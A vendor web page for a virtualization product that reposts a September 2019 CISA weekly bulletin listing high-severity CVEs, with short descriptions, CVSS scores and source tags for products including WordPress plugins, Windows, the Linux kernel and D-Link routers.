We are constantly interested in the latest and up-to-date technology.
As we move forward with the software development we will continue to use new technologies to improve our products and the customer experience. And we will continue to develop our solutions with both new functionality and increasing integration with the latest major platforms.
As the growing market shares and interests in the I.T. virtualization, we tailored the unique virtualization solution vFleXtor using proven, modern up-to-date technology.
Timely information about security topics and threats:
CISA All NCAS Products
CISA All NCAS Products
- Original release date: September 16, 2019
The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available
High Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info 10web -- photo_gallery SQL injection in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via the admin/controllers/Albumsgalleries.php album_id parameter. 2019-09-08 7.5 CVE-2019-16119
MISC
MISC
MISC
MISCadobe -- flash_player Adobe Flash Player 32.0.0.238 and earlier versions, 32.0.0.207 and earlier versions have a Same Origin Method Execution vulnerability. Successful exploitation could lead to Arbitrary Code Execution in the context of the current user. 2019-09-12 10.0 CVE-2019-8069
CONFIRMadobe -- flash_player Adobe Flash Player 32.0.0.238 and earlier versions, 32.0.0.207 and earlier versions have a Use after free vulnerability. Successful exploitation could lead to Arbitrary Code Execution in the context of the current user. 2019-09-12 10.0 CVE-2019-8070
CONFIRMadvantech -- webaccess Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.1 allows a remote, unauthenticated attacker to execute arbitrary code via a crafted IOCTL 70603 RPC message. 2019-09-10 7.5 CVE-2019-3975
MISCapache -- ofbiz The Apache OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. This service takes the `serviceContent` parameter in the request and deserializes it using XStream. This `XStream` instance is slightly guarded by disabling the creation of `ProcessBuilder`. However, this can be easily bypassed (and in multiple ways). Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16 r1850017+1850019 2019-09-11 7.5 CVE-2018-17200
MLISTapache -- ofbiz The java.io.ObjectInputStream is known to cause Java serialisation issues. This issue here is exposed by the "webtools/control/httpService" URL, and uses Java deserialization to perform code execution. In the HttpEngine, the value of the request parameter "serviceContext" is passed to the "deserialize" method of "XmlSerializer". Apache Ofbiz is affected via two different dependencies: "commons-beanutils" and an out-dated version of "commons-fileupload" Mitigation: Upgrade to 16.11.06 or manually apply the commits from OFBIZ-10770 and OFBIZ-10837 on branch 16 2019-09-11 7.5 CVE-2019-0189
MLIST
MLIST
MLISTapache -- ofbiz An RCE is possible by entering Freemarker markup in an Apache OFBiz Form Widget textarea field when encoding has been disabled on such a field. This was the case for the Customer Request "story" input in the Order Manager application. Encoding should not be disabled without good reason and never within a field that accepts user input. Mitigation: Upgrade to 16.11.06 or manually apply the following commit on branch 16.11: r1858533 2019-09-11 7.5 CVE-2019-10074
MLIST
MLISTartifex -- ghostscript A flaw was found in ghostscript, versions 9.x before 9.28, in the setsystemparams procedure where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. A specially crafted PostScript file could disable security protection and then have access to the file system, or execute arbitrary commands. 2019-09-06 7.5 CVE-2019-14813
CONFIRM
REDHAT
CONFIRM
MLIST
BUGTRAQ
DEBIANatutor -- atutor In ATutor 2.2.4, an unauthenticated attacker can change the application settings and force it to use his crafted database, which allows him to gain access to the application. Next, he can change the directory that the application uploads files to, which allows him to achieve remote code execution. This occurs because install/include/header.php does not restrict certain changes (to db_host, db_login, db_password, and content_dir) within install/include/step5.php. 2019-09-09 7.5 CVE-2019-16114
MISC
MISCblake2 -- blake2 An issue was discovered in the blake2 crate before 0.8.1 for Rust. The BLAKE2b and BLAKE2s algorithms, when used with HMAC, produce incorrect results because the block sizes are half of the required sizes. 2019-09-09 7.5 CVE-2019-16143
MISCbroadcom -- ca_client_automation An access vulnerability in CA Common Services DIA of CA Technologies Client Automation 14 and Workload Automation AE 11.3.5, 11.3.6 allows a remote attacker to execute arbitrary code. 2019-09-06 7.5 CVE-2019-13656
MISC
FULLDISC
MISC
BUGTRAQcompact_arena_project -- compact_arena An issue was discovered in the compact_arena crate before 0.4.0 for Rust. Generativity is mishandled, leading to an out-of-bounds write or read. 2019-09-09 9.0 CVE-2019-16139
MISC
MISCcouchbase -- couchbase_server An issue was discovered in Couchbase Server 4.6.3 and 5.5.0. A JSON document to be stored with more than 3000 '\t' characters can crash the indexing system. 2019-09-10 7.8 CVE-2019-11467
MISCcouchbase -- couchbase_server Couchbase Server 5.1.1 generates insufficiently random numbers. The product hosts many network services by default. One of those services is an epmd service, which allows for node integration between Erlang instances. This service is protected by a single 16-character password. Unfortunately, this password is not generated securely due to an insufficient random seed, and can be reasonably brute-forced by an attacker to execute code against a remote system. 2019-09-10 7.5 CVE-2019-11495
MISCdlink -- dir-806_firmware D-Link DIR-806 devices allow remote attackers to execute arbitrary shell commands via a trailing substring of an HTTP header that has "SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/" at the beginning. 2019-09-06 10.0 CVE-2019-10891
MISCdlink -- dir-806_firmware hnap_main in /htdocs/cgibin on D-link DIR-806 v1.0 devices has a stack-based buffer overflow via a long HTTP header that has "SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/" at the beginning. 2019-09-06 10.0 CVE-2019-10892
MISCdlink -- dir-868l_firmware SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php. 2019-09-09 7.5 CVE-2019-16190
MISCdoccms -- doccms upload_model() in /admini/controllers/system/managemodel.php in DocCms 2016.5.17 allow remote attackers to execute arbitrary PHP code through module management files, as demonstrated by a .php file in a ZIP archive. 2019-09-09 7.5 CVE-2019-16192
MISCfacebook -- hhvm Insufficient boundary checks when processing the JPEG APP12 block marker in the GD extension could allow access to out-of-bounds memory via a maliciously constructed invalid JPEG input. This issue affects HHVM versions prior to 3.30.9, all versions between 4.0.0 and 4.8.3, all versions between 4.9.0 and 4.15.2, and versions 4.16.0 to 4.16.3, 4.17.0 to 4.17.2, 4.18.0 to 4.18.1, 4.19.0, 4.20.0 to 4.20.1. 2019-09-06 7.5 CVE-2019-11925
CONFIRM
CONFIRM
CONFIRMfacebook -- hhvm Insufficient boundary checks when processing M_SOFx markers from JPEG headers in the GD extension could allow access to out-of-bounds memory via a maliciously constructed invalid JPEG input. This issue affects HHVM versions prior to 3.30.9, all versions between 4.0.0 and 4.8.3, all versions between 4.9.0 and 4.15.2, and versions 4.16.0 to 4.16.3, 4.17.0 to 4.17.2, 4.18.0 to 4.18.1, 4.19.0, 4.20.0 to 4.20.1. 2019-09-06 7.5 CVE-2019-11926
CONFIRM
CONFIRM
CONFIRMgenerator-rs_project -- generator-rs An issue was discovered in the generator crate before 0.6.18 for Rust. Uninitialized memory is used by Scope, done, and yield_ during API calls. 2019-09-09 7.8 CVE-2019-16144
MISC
MISCgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition 9.x, 10.x, and 11.x before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Incorrect Access Control. Access to the internal wiki is permitted when an external wiki service is enabled. 2019-09-09 7.5 CVE-2019-6960
CONFIRM
CONFIRMgitlabhook_project -- gitlabhook NPM package gitlabhook version 0.0.17 is vulnerable to a Command Injection vulnerability. Arbitrary commands can be injected through the repository name. 2019-09-13 10.0 CVE-2019-5485
MISCgoogle -- android NVIDIA Tegra contains a vulnerability in BootRom where a user with kernel level privileges can write an arbitrary value to an arbitrary physical address 2019-09-06 7.2 CVE-2018-6240
CONFIRM
MISCgoogle -- android In the Android kernel in the mnh driver there is a use after free due to improper locking. This could lead to escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 7.5 CVE-2019-9275
MISCgoogle -- android In the Android kernel in sdcardfs there is a possible violation of the separation of data between profiles due to shared mapping of obb files. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. 2019-09-06 7.2 CVE-2019-9345
MISCgoogle -- android In the Android kernel in VPN routing there is a possible information disclosure. This could lead to remote information disclosure by an adjacent network attacker with no additional execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 7.8 CVE-2019-9461
MISCgravitatedesign -- gravitate_qa_tracker The gravitate-qa-tracker plugin through 1.2.1 for WordPress has PHP Object Injection. 2019-09-10 7.5 CVE-2017-18605
MISC
MISCimage-rs -- image An issue was discovered in the image crate before 0.21.3 for Rust, affecting the HDR image format decoder. Vec::set_len is called on an uninitialized vector, leading to a use-after-free and arbitrary code execution. 2019-09-09 7.5 CVE-2019-16138
MISC
MISCisahc_project -- isahc An issue was discovered in the chttp crate before 0.1.3 for Rust. There is a use-after-free during buffer conversion. 2019-09-09 7.5 CVE-2019-16140
MISCjenkins -- script_security A sandbox bypass vulnerability in Jenkins Script Security Plugin 1.62 and earlier related to the handling of property names in property expressions in increment and decrement expressions allowed attackers to execute arbitrary code in sandboxed scripts. 2019-09-12 7.5 CVE-2019-10399
MLIST
MISCjenkins -- script_security A sandbox bypass vulnerability in Jenkins Script Security Plugin 1.62 and earlier related to the handling of subexpressions in increment and decrement expressions not involving actual assignment allowed attackers to execute arbitrary code in sandboxed scripts. 2019-09-12 7.5 CVE-2019-10400
MLIST
MISCjobberbase -- jobberbase In Jobberbase 2.0, the parameter category is not sanitized in public/page_subscribe.php, leading to /subscribe SQL injection. 2019-09-08 7.5 CVE-2019-16125
MISC
MISClibrenms -- librenms An issue was discovered in LibreNMS through 1.47. The scripts that handle the graphing options (html/includes/graphs/common.inc.php and html/includes/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php script. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, file content, denial of service, or writing arbitrary files. 2019-09-09 7.5 CVE-2019-10665
MISClibreoffice -- libreoffice LibreOffice has a feature where documents can specify that pre-installed macros can be executed on various script events such as mouse-over, document-open etc. Access is intended to be restricted to scripts under the share/Scripts/python, user/Scripts/python sub-directories of the LibreOffice install. Protection was added, to address CVE-2019-9852, to avoid a directory traversal attack where scripts in arbitrary locations on the file system could be executed by employing a URL encoding attack to defeat the path verification step. However this protection could be bypassed by taking advantage of a flaw in how LibreOffice assembled the final script URL location directly from components of the passed in path as opposed to solely from the sanitized output of the path verification step. This issue affects: Document Foundation LibreOffice 6.2 versions prior to 6.2.7; 6.3 versions prior to 6.3.1. 2019-09-06 7.5 CVE-2019-9854
FEDORA
BUGTRAQ
DEBIAN
CONFIRMlibreoffice -- libreoffice LibreOffice is typically bundled with LibreLogo, a programmable turtle vector graphics script, which can execute arbitrary python commands contained with the document it is launched from. LibreOffice also has a feature where documents can specify that pre-installed scripts can be executed on various document script events such as mouse-over, etc. Protection was added to block calling LibreLogo from script event handers. However a Windows 8.3 path equivalence handling flaw left LibreOffice vulnerable under Windows that a document could trigger executing LibreLogo via a Windows filename pseudonym. This issue affects: Document Foundation LibreOffice 6.2 versions prior to 6.2.7; 6.3 versions prior to 6.3.1. 2019-09-06 7.5 CVE-2019-9855
CONFIRMlifterlms -- lifterlms An issue was discovered in the LifterLMS plugin through 3.34.5 for WordPress. The upload_import function in the class.llms.admin.import.php script is prone to an unauthenticated options import vulnerability that could lead to privilege escalation (administrator account creation), website redirection, and stored XSS. 2019-09-10 7.5 CVE-2019-15896
MISC
MISC
MISClimesurvey -- limesurvey A CSV injection vulnerability was found in Limesurvey before 3.17.14 that allows survey participants to inject commands via their survey responses that will be included in the export CSV file. 2019-09-09 7.5 CVE-2019-16184
MISC
MISClinux -- linux_kernel An issue was discovered in the Linux kernel through 5.2.13. nbd_genl_status in drivers/block/nbd.c does not check the nla_nest_start_noflag return value. 2019-09-06 7.5 CVE-2019-16089
MISClinux -- linux_kernel drivers/gpu/drm/amd/amdkfd/kfd_interrupt.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16229
MISClinux -- linux_kernel drivers/gpu/drm/radeon/radeon_display.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16230
MISClinux -- linux_kernel drivers/net/fjes/fjes_main.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16231
MISClinux -- linux_kernel drivers/net/wireless/marvell/libertas/if_sdio.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16232
MISClinux -- linux_kernel drivers/scsi/qla2xxx/qla_os.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16233
MISClinux -- linux_kernel drivers/net/wireless/intel/iwlwifi/pcie/trans.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. 2019-09-11 7.8 CVE-2019-16234
MISCmicrofocus -- data_protector Privileges manipulation in Micro Focus Data Protector, versions 10.00, 10.01, 10.02, 10.03, 10.04, 10.10, 10.20, 10.30, 10.40. This vulnerability could be exploited by a low-privileged user to execute a custom binary with higher privileges. 2019-09-13 7.2 CVE-2019-11660
CONFIRMmicrosoft -- chakracore A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1217, CVE-2019-1237, CVE-2019-1298, CVE-2019-1300. 2019-09-11 7.6 CVE-2019-1138
MISCmicrosoft -- chakracore A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1237, CVE-2019-1298, CVE-2019-1300. 2019-09-11 7.6 CVE-2019-1217
MISCmicrosoft -- chakracore A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1298, CVE-2019-1300. 2019-09-11 7.6 CVE-2019-1237
MISCmicrosoft -- chakracore A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1300. 2019-09-11 7.6 CVE-2019-1298
MISCmicrosoft -- chakracore A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298. 2019-09-11 7.6 CVE-2019-1300
MISCmicrosoft -- excel A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. 2019-09-11 9.3 CVE-2019-1297
MISCmicrosoft -- exchange_server A denial of service vulnerability exists in Microsoft Exchange Server software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Denial of Service Vulnerability'. 2019-09-11 7.8 CVE-2019-1233
MISCmicrosoft -- internet_explorer A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1236. 2019-09-11 7.6 CVE-2019-1208
MISC
MISCmicrosoft -- internet_explorer A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. 2019-09-11 7.6 CVE-2019-1221
MISCmicrosoft -- office A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1246
MISCmicrosoft -- team_foundation_server A remote code execution vulnerability exists when Azure DevOps Server (ADO) and Team Foundation Server (TFS) fail to validate input properly, aka 'Azure DevOps and Team Foundation Server Remote Code Execution Vulnerability'. 2019-09-11 7.5 CVE-2019-1306
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server, aka 'Remote Desktop Client Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0788, CVE-2019-1290, CVE-2019-1291. 2019-09-11 9.3 CVE-2019-0787
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server, aka 'Remote Desktop Client Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0787, CVE-2019-1290, CVE-2019-1291. 2019-09-11 9.3 CVE-2019-0788
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory, aka 'Windows Common Log File System Driver Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1214
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1253, CVE-2019-1278, CVE-2019-1303. 2019-09-11 7.2 CVE-2019-1215
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server process does not validate the source of input or commands it receives, aka 'Windows Text Service Framework Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1235
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1208. 2019-09-11 7.6 CVE-2019-1236
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1240
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1241
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1242
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1243
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1248, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1247
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1249, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1248
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1250. 2019-09-11 9.3 CVE-2019-1249
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1240, CVE-2019-1241, CVE-2019-1242, CVE-2019-1243, CVE-2019-1246, CVE-2019-1247, CVE-2019-1248, CVE-2019-1249. 2019-09-11 9.3 CVE-2019-1250
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1278, CVE-2019-1303. 2019-09-11 7.2 CVE-2019-1253
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1285. 2019-09-11 7.2 CVE-2019-1256
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Microsoft Compatibility Appraiser where a configuration file, with local privileges, is vulnerable to symbolic link and hard link attacks, aka 'Microsoft Compatibility Appraiser Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1267
MISCmicrosoft -- windows_10 An elevation of privilege exists when Winlogon does not properly handle file path information, aka 'Winlogon Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1268
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system, aka 'Windows ALPC Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1272. 2019-09-11 7.2 CVE-2019-1269
MISCmicrosoft -- windows_10 An elevation of privilege exists in hdAudio.sys which may lead to an out of band write, aka 'Windows Media Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1271
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system, aka 'Windows ALPC Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1269. 2019-09-11 7.2 CVE-2019-1272
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.An attacker who successfully exploited this vulnerability could gain the same user rights as the local user, aka 'LNK Remote Code Execution Vulnerability'. 2019-09-11 9.3 CVE-2019-1280
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1256. 2019-09-11 7.2 CVE-2019-1285
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server, aka 'Remote Desktop Client Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0787, CVE-2019-0788, CVE-2019-1291. 2019-09-11 9.3 CVE-2019-1290
MISCmicrosoft -- windows_10 A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server, aka 'Remote Desktop Client Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0787, CVE-2019-0788, CVE-2019-1290. 2019-09-11 9.3 CVE-2019-1291
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1253, CVE-2019-1278. 2019-09-11 7.2 CVE-2019-1303
MISCmicrosoft -- windows_7 An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. 2019-09-11 7.2 CVE-2019-1284
MISCmsi -- afterburner The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. 2019-09-11 7.2 CVE-2019-16098
MISCopencv -- opencv OpenCV 4.1.1 has an out-of-bounds read in hal_baseline::v_load in core/hal/intrin_sse.hpp when called from computeSSDMeanNorm in modules/video/src/dis_flow.cpp. 2019-09-11 7.5 CVE-2019-16249
MISCphp -- ext-http A type confusion vulnerability in the merge_param() function of php_http_params.c in PHP's pecl-http extension 3.1.0beta2 (PHP 7) and earlier as well as 2.6.0beta2 (PHP 5) and earlier allows attackers to crash PHP and possibly execute arbitrary code via crafted HTTP requests. 2019-09-06 7.5 CVE-2016-7398
MISC
MISC
MISCpodlove -- podlove_podcast_publisher The podlove-podcasting-plugin-for-wordpress plugin before 2.3.16 for WordPress has SQL injection via the insert_id parameter exploitable via CSRF. 2019-09-13 7.5 CVE-2016-10942
MISC
MISC
MISCpy-lmdb_project -- py-lmdb An issue was discovered in py-lmdb 0.97. For certain values of md_flags, mdb_node_add does not properly set up a memcpy destination, leading to an invalid write operation. 2019-09-11 7.5 CVE-2019-16224
MISCpy-lmdb_project -- py-lmdb An issue was discovered in py-lmdb 0.97. For certain values of mp_flags, mdb_page_touch does not properly set up mc->mc_pg[mc->top], leading to an invalid write operation. 2019-09-11 7.5 CVE-2019-16225
MISCpy-lmdb_project -- py-lmdb An issue was discovered in py_lmdb 0.97. For certain values of mn_flags, mdb_cursor_set triggers a memcpy with an invalid write operation within mdb_xcursor_init1. 2019-09-11 7.5 CVE-2019-16227
MISCrenderdocs-rs_project -- renderdocs-rs An issue was discovered in the renderdoc crate before 0.5.0 for Rust. Multiple exposed methods take self by immutable reference, which is incompatible with a multi-threaded application. 2019-09-09 7.5 CVE-2019-16142
MISC
MISCsahipro -- sahi_pro An issue was discovered in Tyto Sahi Pro 6.x through 8.0.0. TestRunner_Non_distributed (and distributed end points) does not have any authentication mechanism. This allow an attacker to execute an arbitrary script on the remote Sahi Pro server. There is also a password-protected web interface intended for remote access to scripts. This web interface lacks server-side validation, which allows an attacker to create/modify/delete a script remotely without any password. Chaining both of these issues results in remote code execution on the Sahi Pro server. 2019-09-06 7.5 CVE-2019-15102
MISCsap -- hana The administrator of SAP HANA database, before versions 1.0 and 2.0, can misuse HANA to execute commands with operating system "root" privileges. 2019-09-10 7.2 CVE-2019-0357
MISC
CONFIRMsap -- sap_kernel SAP Kernel (RFC), KRNL32NUC, KRNL32UC and KRNL64NUC before versions 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64UC, before versions 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.73 and KERNEL before versions 7.21, 7.49, 7.53, 7.73, 7.76 SAP GUI for Windows (BC-FES-GUI) before versions 7.5, 7.6, and SAP GUI for Java (BC-FES-JAV) before version 7.5, allow an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. 2019-09-10 7.8 CVE-2019-0365
MISC
CONFIRMsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x has an SNMP service with a public value for rocommunity and trapcommunity. 2019-09-08 7.5 CVE-2019-16102
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows privilege escalation (by administrators) from the menu to a root Bash OS shell via the spsshell feature. 2019-09-08 9.0 CVE-2019-16103
MISCspin-rs_project -- spin-rs An issue was discovered in the spin crate before 0.5.2 for Rust, when RwLock is used. Because memory ordering is mishandled, two writers can acquire the lock at the same time, violating mutual exclusion. 2019-09-09 7.8 CVE-2019-16137
MISCsymonics -- libmysofa Symonics libmysofa 0.7 has a NULL pointer dereference in getHrtf in hrtf/reader.c. 2019-09-07 7.5 CVE-2019-16092
MISCsymonics -- libmysofa Symonics libmysofa 0.7 has an invalid write in readOHDRHeaderMessageDataLayout in hdf/dataobject.c. 2019-09-07 7.5 CVE-2019-16093
MISCteamviewer -- teamviewer An issue was discovered in TeamViewer 14.2.2558. Updating the product as a non-administrative user requires entering administrative credentials into the GUI. Subsequently, these credentials are processed in Teamviewer.exe, which allows any application running in the same non-administrative user context to intercept them in cleartext within process memory. By using this technique, a local attacker is able to obtain administrative credentials in order to elevate privileges. This vulnerability can be exploited by injecting code into Teamviewer.exe which intercepts calls to GetWindowTextW and logs the processed credentials. 2019-09-11 7.2 CVE-2019-11769
MISC
MISCtelestar -- bobs_rock_radio_firmware TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have an undocumented TELNET service within the BusyBox subsystem, leading to root access. 2019-09-11 10.0 CVE-2019-13473
MISC
